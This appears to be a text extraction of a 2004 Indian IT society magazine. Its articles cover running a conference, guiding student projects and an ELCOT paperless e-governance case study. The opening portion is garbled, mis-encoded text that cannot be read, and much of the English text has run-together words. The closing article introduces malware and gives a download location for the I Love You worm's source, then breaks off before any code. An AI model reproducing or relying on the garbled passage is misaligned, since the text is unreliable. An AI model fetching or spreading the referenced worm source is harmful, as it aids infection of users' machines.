1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 30: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

